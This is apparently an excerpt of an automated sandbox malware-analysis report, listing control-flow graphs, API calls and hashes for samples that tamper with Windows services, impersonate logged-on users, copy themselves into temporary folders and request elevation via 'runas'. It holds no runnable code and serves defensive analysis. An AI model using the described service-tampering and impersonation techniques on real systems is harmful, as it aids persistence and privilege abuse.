                                                                      control_flow_graph 17 7ffbafd51b10-7ffbafd51b17 18 7ffbafd51b22-7ffbafd51bd8 17->18 19 7ffbafd51b19-7ffbafd51b21 17->19 24 7ffbafd51bda-7ffbafd51be9 18->24 25 7ffbafd51c36-7ffbafd51c68 18->25 19->18 24->25 26 7ffbafd51beb-7ffbafd51bee 24->26 32 7ffbafd51cc7-7ffbafd51d00 25->32 33 7ffbafd51c6a-7ffbafd51c7a 25->33 27 7ffbafd51bf0-7ffbafd51c03 26->27 28 7ffbafd51c28-7ffbafd51c30 26->28 30 7ffbafd51c07-7ffbafd51c1a 27->30 31 7ffbafd51c05 27->31 28->25 30->30 34 7ffbafd51c1c-7ffbafd51c24 30->34 31->30 41 7ffbafd51d02-7ffbafd51d11 32->41 42 7ffbafd51d5e-7ffbafd51d97 32->42 33->32 35 7ffbafd51c7c-7ffbafd51c7f 33->35 34->28 36 7ffbafd51c81-7ffbafd51c94 35->36 37 7ffbafd51cb9-7ffbafd51cc1 35->37 39 7ffbafd51c98-7ffbafd51cab 36->39 40 7ffbafd51c96 36->40 37->32 39->39 43 7ffbafd51cad-7ffbafd51cb5 39->43 40->39 41->42 44 7ffbafd51d13-7ffbafd51d16 41->44 48 7ffbafd51d99-7ffbafd51da9 42->48 49 7ffbafd51df6-7ffbafd51e2f 42->49 43->37 46 7ffbafd51d50-7ffbafd51d58 44->46 47 7ffbafd51d18-7ffbafd51d2b 44->47 46->42 50 7ffbafd51d2f-7ffbafd51d42 47->50 51 7ffbafd51d2d 47->51 48->49 52 7ffbafd51dab-7ffbafd51dae 48->52 59 7ffbafd51e31-7ffbafd51e41 49->59 60 7ffbafd51e8e-7ffbafd51ec7 49->60 50->50 53 7ffbafd51d44-7ffbafd51d4c 50->53 51->50 54 7ffbafd51db0-7ffbafd51dc3 52->54 55 7ffbafd51de8-7ffbafd51df0 52->55 53->46 57 7ffbafd51dc7-7ffbafd51dda 54->57 58 7ffbafd51dc5 54->58 55->49 57->57 61 7ffbafd51ddc-7ffbafd51de4 57->61 58->57 59->60 62 7ffbafd51e43-7ffbafd51e46 59->62 66 7ffbafd51ec9-7ffbafd51ed9 60->66 67 7ffbafd51f26-7ffbafd51fe2 ChangeServiceConfigA 60->67 61->55 64 7ffbafd51e80-7ffbafd51e88 62->64 65 7ffbafd51e48-7ffbafd51e5b 62->65 64->60 68 7ffbafd51e5f-7ffbafd51e72 65->68 69 7ffbafd51e5d 65->69 66->67 71 7ffbafd51edb-7ffbafd51ede 66->71 75 7ffbafd51fea-7ffbafd51ffc call 7ffbafd52049 67->75 76 7ffbafd51fe4 67->76 68->68 70 7ffbafd51e74-7ffbafd51e7c 68->70 69->68 70->64 72 7ffbafd51ee0-7ffbafd51ef3 71->72 73 7ffbafd51f18-7ffbafd51f20 71->73 77 7ffbafd51ef7-7ffbafd51f0a 72->77 78 7ffbafd51ef5 72->78 73->67 81 7ffbafd52001-7ffbafd5202d 75->81 76->75 77->77 80 7ffbafd51f0c-7ffbafd51f14 77->80 78->77 80->73 83 7ffbafd5202f 81->83 84 7ffbafd52034-7ffbafd52048 81->84 83->84
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.400223703.00007FFBAFD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAFD50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_7ffbafd50000_nika.jbxd
                                                                      Similarity
                                                                      • API ID: ChangeConfigService
                                                                      • String ID:
                                                                      • API String ID: 3849694230-0
                                                                      • Opcode ID: 68759dd24562f89bc8c60e7e1dcff7698ae75f9a125f3402cc0351d71fe92a17
                                                                      • Instruction ID: 2337e443f78e618980b5362d0e817694014626dbdf8b2d4cce92ea47af82b7d6
                                                                      • Opcode Fuzzy Hash: 68759dd24562f89bc8c60e7e1dcff7698ae75f9a125f3402cc0351d71fe92a17
                                                                      • Instruction Fuzzy Hash: 2BF1B470A18A4E4FEB69EE28C8467F977D1FB54311F10426EDC9EC7281DE74A5818B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.400223703.00007FFBAFD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAFD50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_7ffbafd50000_nika.jbxd
                                                                      Similarity
                                                                      • API ID: NameUser
                                                                      • String ID:
                                                                      • API String ID: 2645101109-0
                                                                      • Opcode ID: 0f9a7d583ec1eca681f74a1e3c941a1f2db55dfa1810749686399c1358b4f22b
                                                                      • Instruction ID: 28ca77df6a6807a9930e1440a760443326b1c17fcb937fc811a11eb58e683e40
                                                                      • Opcode Fuzzy Hash: 0f9a7d583ec1eca681f74a1e3c941a1f2db55dfa1810749686399c1358b4f22b
                                                                      • Instruction Fuzzy Hash: 38916F70608A4D8FEBA9EF28C8597E97B91EB54311F00417ED88DC7292CE75A981CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 121 7ffbafd50c34-7ffbafd50c3b 122 7ffbafd50c3d-7ffbafd50c45 121->122 123 7ffbafd50c46-7ffbafd50ce5 121->123 122->123 128 7ffbafd50d40-7ffbafd50daa OpenServiceA 123->128 129 7ffbafd50ce7-7ffbafd50cf6 123->129 134 7ffbafd50db2-7ffbafd50de6 call 7ffbafd50e02 128->134 135 7ffbafd50dac 128->135 129->128 130 7ffbafd50cf8-7ffbafd50cfb 129->130 132 7ffbafd50cfd-7ffbafd50d10 130->132 133 7ffbafd50d35-7ffbafd50d3d 130->133 136 7ffbafd50d12 132->136 137 7ffbafd50d14-7ffbafd50d27 132->137 133->128 142 7ffbafd50ded-7ffbafd50e01 134->142 143 7ffbafd50de8 134->143 135->134 136->137 137->137 138 7ffbafd50d29-7ffbafd50d31 137->138 138->133 143->142
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.400223703.00007FFBAFD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAFD50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_7ffbafd50000_nika.jbxd
                                                                      Similarity
                                                                      • API ID: OpenService
                                                                      • String ID:
                                                                      • API String ID: 3098006287-0
                                                                      • Opcode ID: 7d07b2c48197868903858cf120fd0195750c69f452db804631259a123840e7ce
                                                                      • Instruction ID: af0fcfaa49f0cbe43b67a75e647a11af71bebf67f180ae51784c3428d3d06875
                                                                      • Opcode Fuzzy Hash: 7d07b2c48197868903858cf120fd0195750c69f452db804631259a123840e7ce
                                                                      • Instruction Fuzzy Hash: 8151B670A08A4D4FEB59EF28C84A7F977D1FB59311F10426EE89DC3292DE74A841CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 144 7ffbafd5108a-7ffbafd510b3 145 7ffbafd510be-7ffbafd51152 FindCloseChangeNotification 144->145 146 7ffbafd510b5-7ffbafd510bd 144->146 150 7ffbafd5115a-7ffbafd51181 145->150 151 7ffbafd51154 145->151 146->145 151->150
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.400223703.00007FFBAFD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAFD50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_7ffbafd50000_nika.jbxd
                                                                      Similarity
                                                                      • API ID: ChangeCloseFindNotification
                                                                      • String ID:
                                                                      • API String ID: 2591292051-0
                                                                      • Opcode ID: 7a6ec3f9e2c247e41a9204d60c4fcf915b8c81e7ca278c5bfac9bc9567586214
                                                                      • Instruction ID: 5b2206c7a24b30e4cb5c8534ae5444ff95941bb15dfc4ffea44eb3ee5baf91c7
                                                                      • Opcode Fuzzy Hash: 7a6ec3f9e2c247e41a9204d60c4fcf915b8c81e7ca278c5bfac9bc9567586214
                                                                      • Instruction Fuzzy Hash: F731F63090CB8C4FDB0ADB7888157E97FF0EF56321F04429FD089C31A2DA696456CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 152 7ffbafd50b4b-7ffbafd50bb8 156 7ffbafd50bc2-7ffbafd50bc7 152->156 157 7ffbafd50bba-7ffbafd50bbf 152->157 158 7ffbafd50bd1-7ffbafd50c08 OpenSCManagerW 156->158 159 7ffbafd50bc9-7ffbafd50bce 156->159 157->156 160 7ffbafd50c10-7ffbafd50c2d 158->160 161 7ffbafd50c0a 158->161 159->158 161->160
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.400223703.00007FFBAFD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAFD50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_7ffbafd50000_nika.jbxd
                                                                      Similarity
                                                                      • API ID: ManagerOpen
                                                                      • String ID:
                                                                      • API String ID: 1889721586-0
                                                                      • Opcode ID: e636076e1c2de0953c268ef612b3dcf0cacc4a9f652f8c5c5b63a7e2d65113ae
                                                                      • Instruction ID: beed67f9ae72b4a7b90c72c4eb2c19d7bec9cd8f076e7a5171586e014aadb24d
                                                                      • Opcode Fuzzy Hash: e636076e1c2de0953c268ef612b3dcf0cacc4a9f652f8c5c5b63a7e2d65113ae
                                                                      • Instruction Fuzzy Hash: 0F317E71908B1C8FDB69DF98D8896F9BBE0EB69312F00412FD48AD3651DE706445CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 162 7ffbafd51a3b-7ffbafd51ad9 ControlService 166 7ffbafd51ae1-7ffbafd51b09 162->166 167 7ffbafd51adb 162->167 167->166
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.400223703.00007FFBAFD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAFD50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_7ffbafd50000_nika.jbxd
                                                                      Similarity
                                                                      • API ID: ControlService
                                                                      • String ID:
                                                                      • API String ID: 253159669-0
                                                                      • Opcode ID: 705a0f78e6ee4a91d5abbbf6bd005019735ad35248e9d1dfc3ff997337fcf8ea
                                                                      • Instruction ID: 56a51a378cac86b001eea1fe900d91a13f522010afc6437056a4952524f5f122
                                                                      • Opcode Fuzzy Hash: 705a0f78e6ee4a91d5abbbf6bd005019735ad35248e9d1dfc3ff997337fcf8ea
                                                                      • Instruction Fuzzy Hash: 2D31B171A0CB1C8FDB18DF9CD845AF97BE1EB65721F00412FE08AD3252CB64A846CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 168 7ffbafd50108-7ffbafd50114 170 7ffbafd5012b-7ffbafd51802 ImpersonateLoggedOnUser 168->170 171 7ffbafd50116 168->171 175 7ffbafd5180a-7ffbafd51831 170->175 176 7ffbafd51804 170->176 171->170 176->175
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.400223703.00007FFBAFD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAFD50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_7ffbafd50000_nika.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4c0379d93d60dcedc2f6133869d0fadf4dbdfa74309fc04d3bca5b7f90699289
                                                                      • Instruction ID: 5d74dc4fb315f8e2c75977804d70f30653a90f4ef8f010923e2c9e2498624b04
                                                                      • Opcode Fuzzy Hash: 4c0379d93d60dcedc2f6133869d0fadf4dbdfa74309fc04d3bca5b7f90699289
                                                                      • Instruction Fuzzy Hash: 6821D571A0CA0D9FDB59DF68C845BF9BBE0FB55321F00412ED08ED3192DB64A856CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 177 7ffbafd5176e-7ffbafd517c5 180 7ffbafd517cd-7ffbafd51802 ImpersonateLoggedOnUser 177->180 181 7ffbafd5180a-7ffbafd51831 180->181 182 7ffbafd51804 180->182 182->181
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.400223703.00007FFBAFD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAFD50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_7ffbafd50000_nika.jbxd
                                                                      Similarity
                                                                      • API ID: ImpersonateLoggedUser
                                                                      • String ID:
                                                                      • API String ID: 2216092060-0
                                                                      • Opcode ID: 12276837d4ac4088b6764640e93a4dfa6c1ee08f43bd2057f9c8ef098324caba
                                                                      • Instruction ID: 7c1d1c0b7606e6509a00e6e9dad7b5aa958e75187cc59b9f08d36aaf7309acb1
                                                                      • Opcode Fuzzy Hash: 12276837d4ac4088b6764640e93a4dfa6c1ee08f43bd2057f9c8ef098324caba
                                                                      • Instruction Fuzzy Hash: 3B21D23190CA0C8FDB58DFA8C805BF9BBE0FB55321F00426FD049D3592CB64A856CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(011EE000,?,011EA9A0,011EAF26,?,011EE000,011EAF26,011EE000), ref: 011EA9C3
                                                                      • TerminateProcess.KERNEL32(00000000,?,011EA9A0,011EAF26,?,011EE000,011EAF26,011EE000), ref: 011EA9CA
                                                                      • ExitProcess.KERNEL32 ref: 011EA9DC
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Process$CurrentExitTerminate
                                                                      • String ID:
                                                                      • API String ID: 1703294689-0
                                                                      • Opcode ID: ec3eb559d07c4be2411e0ae9f2e539e7ad488c4d4947ef9a9f8ff9b3adb8d085
                                                                      • Instruction ID: cd094c35a923f760cf078fb47c2acc41d7a4179027f7b9914cf9debb452fe6fd
                                                                      • Opcode Fuzzy Hash: ec3eb559d07c4be2411e0ae9f2e539e7ad488c4d4947ef9a9f8ff9b3adb8d085
                                                                      • Instruction Fuzzy Hash: A4E0B635005908AFCB2A6B99E80CA993BA9EF51241F164829F91687131DB35EDC1DBD2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 011F2368: CreateFileW.KERNELBASE(00000000,00000000,?,011F2758,?,?,00000000,?,011F2758,00000000,0000000C), ref: 011F2385
                                                                      • GetLastError.KERNEL32 ref: 011F27C3
                                                                      • __dosmaperr.LIBCMT ref: 011F27CA
                                                                      • GetFileType.KERNELBASE(00000000), ref: 011F27D6
                                                                      • GetLastError.KERNEL32 ref: 011F27E0
                                                                      • __dosmaperr.LIBCMT ref: 011F27E9
                                                                      • CloseHandle.KERNEL32(00000000), ref: 011F2809
                                                                      • CloseHandle.KERNEL32(011ED4F0), ref: 011F2956
                                                                      • GetLastError.KERNEL32 ref: 011F2988
                                                                      • __dosmaperr.LIBCMT ref: 011F298F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                      • String ID: H
                                                                      • API String ID: 4237864984-2852464175
                                                                      • Opcode ID: 13b6da85c07aa9a2b53e41c478508cf35cd64b98ec1dae9d8964f562839b4d11
                                                                      • Instruction ID: c306d650995716ed2df48557ca6430d36a1dc6f7299172e46d998b9143b86a5b
                                                                      • Opcode Fuzzy Hash: 13b6da85c07aa9a2b53e41c478508cf35cd64b98ec1dae9d8964f562839b4d11
                                                                      • Instruction Fuzzy Hash: CEA12632A045558FCF1EDFA8D855BAE3BE1AB0A324F14015DE912AF392DB34DC52CB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 69 11d9c30-11d9cba call 11e5ac0 call 11d2ce0 GetTempPathA 74 11d9cc0-11d9cc5 69->74 74->74 75 11d9cc7-11d9d5b call 11e5e20 call 11e5f70 74->75 81 11d9d5d-11d9d6c 75->81 82 11d9d8c-11d9e02 call 11e5ac0 call 11d2ce0 call 11e62f0 call 11e5f70 75->82 83 11d9d6e-11d9d7c 81->83 84 11d9d82-11d9d89 call 11e7684 81->84 103 11d9e04-11d9e13 82->103 104 11d9e33-11d9e5b 82->104 83->84 86 11da181 call 11ebcdc 83->86 84->82 92 11da186 86->92 94 11da18b-11da1b8 call 11e59a0 * 2 CopyFileA call 11d5120 92->94 95 11da186 call 11ebcdc 92->95 118 11da209-11da20b call 11eaa9f 94->118 119 11da1ba-11da201 call 11e5a80 call 11e5ac0 call 11e5a80 call 11d3b10 94->119 95->94 106 11d9e29-11d9e30 call 11e7684 103->106 107 11d9e15-11d9e23 103->107 108 11d9e5d-11d9e6c 104->108 109 11d9e8c-11d9edf GetModuleFileNameA 104->109 106->104 107->92 107->106 112 11d9e6e-11d9e7c 108->112 113 11d9e82-11d9e89 call 11e7684 108->113 115 11d9ee0-11d9ee5 109->115 112->92 112->113 113->109 115->115 120 11d9ee7-11d9f38 call 11e5e20 115->120 125 11da210-11da215 call 11ebcdc 118->125 154 11da206 119->154 128 11d9f3a-11d9f3d 120->128 129 11d9f94-11d9fb4 call 11eab6c 120->129 133 11d9f3f 128->133 134 11d9f51-11d9f54 128->134 142 11d9fdc-11da000 call 11eab6c 129->142 143 11d9fb6-11d9fd9 call 11eabfa call 11eae87 129->143 138 11d9f40-11d9f44 133->138 139 11d9f8a 134->139 140 11d9f56-11d9f5a 134->140 138->140 144 11d9f46-11d9f4f 138->144 147 11d9f8c-11d9f8e 139->147 145 11d9f5c-11d9f5f 140->145 146 11d9f83-11d9f88 140->146 164 11da010-11da06d GetFileAttributesA CreateDirectoryA GetFileAttributesA 142->164 165 11da002-11da00b call 11eabfa 142->165 143->142 144->134 144->138 145->139 151 11d9f61-11d9f67 145->151 146->147 147->129 153 11da083-11da08c 147->153 151->146 156 11d9f69-11d9f6c 151->156 158 11da0bf-11da0e3 153->158 159 11da08e-11da099 153->159 154->118 156->139 163 11d9f6e-11d9f74 156->163 160 11da0e5-11da0f0 158->160 161 11da110-11da134 158->161 166 11da0af-11da0bc call 11e7684 159->166 167 11da09b-11da0a9 159->167 169 11da106-11da10d call 11e7684 160->169 170 11da0f2-11da100 160->170 173 11da165-11da180 call 11e7012 161->173 174 11da136-11da145 161->174 163->146 175 11d9f76-11d9f79 163->175 187 11da06f-11da071 164->187 188 11da077-11da07d 164->188 165->118 165->153 166->158 167->125 167->166 169->161 170->125 170->169 181 11da15b-11da162 call 11e7684 174->181 182 11da147-11da155 174->182 175->139 183 11d9f7b-11d9f81 175->183 181->173 182->125 182->181 183->139 183->146 187->94 187->188 188->153
                                                                      APIs
                                                                      • GetTempPathA.KERNEL32(00000104,?), ref: 011D9C90
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PathTemp
                                                                      • String ID:
                                                                      • API String ID: 2920410445-0
                                                                      • Opcode ID: b4f1f8c1b6f7583a5ed31e2e3cd31c5e84da48615e0c46c1efdb238e7e7bf9fa
                                                                      • Instruction ID: 306002a519a5ce266d391ca47b6dd116349fe44af605be81a1c5cb0ae86539ba
                                                                      • Opcode Fuzzy Hash: b4f1f8c1b6f7583a5ed31e2e3cd31c5e84da48615e0c46c1efdb238e7e7bf9fa
                                                                      • Instruction Fuzzy Hash: A4A1B0B0A002688BEF28DB24CC487DDBBB5AF45318F4441D8D60967282DB715FC8CFA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 191 11d3ff0-11d4050 call 11e62f0 call 11e6070 196 11d407e-11d40fa call 11e5ac0 * 2 call 11d2ce0 call 11e5e20 call 11d3b10 191->196 197 11d4052-11d405e 191->197 222 11d40fc-11d4108 196->222 223 11d4128-11d412e 196->223 199 11d4074-11d407b call 11e7684 197->199 200 11d4060-11d406e 197->200 199->196 200->199 203 11d41b7 call 11ebcdc 200->203 207 11d41bc-11d428a call 11ebcdc call 11e5ac0 call 11d2ce0 call 11e6070 call 11e5ac0 call 11d2ce0 call 11e5e20 call 11d3b10 203->207 252 11d428c-11d4298 207->252 253 11d42b4-11d42c5 Sleep 207->253 227 11d411e-11d4125 call 11e7684 222->227 228 11d410a-11d4118 222->228 224 11d4158-11d4170 223->224 225 11d4130-11d413c 223->225 232 11d419a-11d41b6 call 11e7012 224->232 233 11d4172-11d417e 224->233 230 11d414e-11d4155 call 11e7684 225->230 231 11d413e-11d414c 225->231 227->223 228->207 228->227 230->224 231->207 231->230 237 11d4190-11d4197 call 11e7684 233->237 238 11d4180-11d418e 233->238 237->232 238->207 238->237 254 11d42aa-11d42b1 call 11e7684 252->254 255 11d429a-11d42a8 252->255 256 11d42ef-11d4308 call 11e7012 253->256 257 11d42c7-11d42d3 253->257 254->253 255->254 259 11d4309 call 11ebcdc 255->259 261 11d42e5-11d42ec call 11e7684 257->261 262 11d42d5-11d42e3 257->262 266 11d430e-11d435f call 11ebcdc call 11d3740 259->266 261->256 262->261 262->266 273 11d4361 266->273 274 11d4363-11d4370 SetCurrentDirectoryA 266->274 273->274 275 11d439e-11d4458 call 11e5ac0 call 11d2ce0 call 11e5ac0 call 11d2ce0 call 11e6070 call 11e5f70 call 11e5ac0 call 11d2ce0 call 11e5e20 call 11d3b10 274->275 276 11d4372-11d437e 274->276 308 11d445a-11d4466 275->308 309 11d4486-11d449e 275->309 278 11d4394-11d439b call 11e7684 276->278 279 11d4380-11d438e 276->279 278->275 279->278 281 11d4558 call 11ebcdc 279->281 286 11d455d call 11ebcdc 281->286 290 11d4562-11d4567 call 11ebcdc 286->290 310 11d447c-11d4483 call 11e7684 308->310 311 11d4468-11d4476 308->311 312 11d44cc-11d44e4 309->312 313 11d44a0-11d44ac 309->313 310->309 311->286 311->310 314 11d450e-11d4514 312->314 315 11d44e6-11d44f2 312->315 317 11d44ae-11d44bc 313->317 318 11d44c2-11d44c9 call 11e7684 313->318 321 11d453e-11d4557 call 11e7012 314->321 322 11d4516-11d4522 314->322 319 11d4504-11d450b call 11e7684 315->319 320 11d44f4-11d4502 315->320 317->286 317->318 318->312 319->314 320->286 320->319 327 11d4534-11d453b call 11e7684 322->327 328 11d4524-11d4532 322->328 327->321 328->290 328->327
                                                                      APIs
                                                                      • Sleep.KERNEL32(000003E8), ref: 011D42B9
                                                                      • SetCurrentDirectoryA.KERNEL32(00000000,9BC7B195), ref: 011D4364
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CurrentDirectorySleep
                                                                      • String ID: runas
                                                                      • API String ID: 16921501-4000483414
                                                                      • Opcode ID: 8d5b32cb5e9ff687618d6a9cc5ef1e96baeec0940e19ee19eed6f5c6088e40ef
                                                                      • Instruction ID: 0fd4b8e401c8a46b3c89951ef66b5b95afc128ee2d52eddcd4b1632dd1e0c9d7
                                                                      • Opcode Fuzzy Hash: 8d5b32cb5e9ff687618d6a9cc5ef1e96baeec0940e19ee19eed6f5c6088e40ef
                                                                      • Instruction Fuzzy Hash: 0BE16C71A102449BEB0CEBB8CD4979DBFB2EF56318F54824CE411AB7C5DB359A408BD2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 334 11da032-11da034 335 11da036-11da04d CreateDirectoryA 334->335 336 11da053-11da06d GetFileAttributesA 334->336 335->336 337 11da06f-11da071 336->337 338 11da077-11da08c 336->338 337->338 339 11da18b-11da1b8 call 11e59a0 * 2 CopyFileA call 11d5120 337->339 342 11da0bf-11da0e3 338->342 343 11da08e-11da099 338->343 370 11da209-11da20b call 11eaa9f 339->370 371 11da1ba-11da206 call 11e5a80 call 11e5ac0 call 11e5a80 call 11d3b10 339->371 345 11da0e5-11da0f0 342->345 346 11da110-11da134 342->346 347 11da0af-11da0bc call 11e7684 343->347 348 11da09b-11da0a9 343->348 352 11da106-11da10d call 11e7684 345->352 353 11da0f2-11da100 345->353 354 11da165-11da180 call 11e7012 346->354 355 11da136-11da145 346->355 347->342 348->347 349 11da210-11da215 call 11ebcdc 348->349 352->346 353->349 353->352 361 11da15b-11da162 call 11e7684 355->361 362 11da147-11da155 355->362 361->354 362->349 362->361 370->349 371->370
                                                                      APIs
                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?), ref: 011DA04D
                                                                      • GetFileAttributesA.KERNELBASE(?,?,?,?,?), ref: 011DA068
                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 011DA1A5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$AttributesCopyCreateDirectory
                                                                      • String ID:
                                                                      • API String ID: 210682061-0
                                                                      • Opcode ID: 737033a20c78800e0eb0c5a7c9040abb6579c4449cc9a353c3dd98565f2e3213
                                                                      • Instruction ID: 29589715f1dd299ca9d1e48c8e5194819f8b83cc35e02f2c27eb0d48e5c7dbb9
                                                                      • Opcode Fuzzy Hash: 737033a20c78800e0eb0c5a7c9040abb6579c4449cc9a353c3dd98565f2e3213
                                                                      • Instruction Fuzzy Hash: E7412CB1A001188FEB1CDB78CC9979CBB75AF45318F4401DCD609A32C2DB316AC48F6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
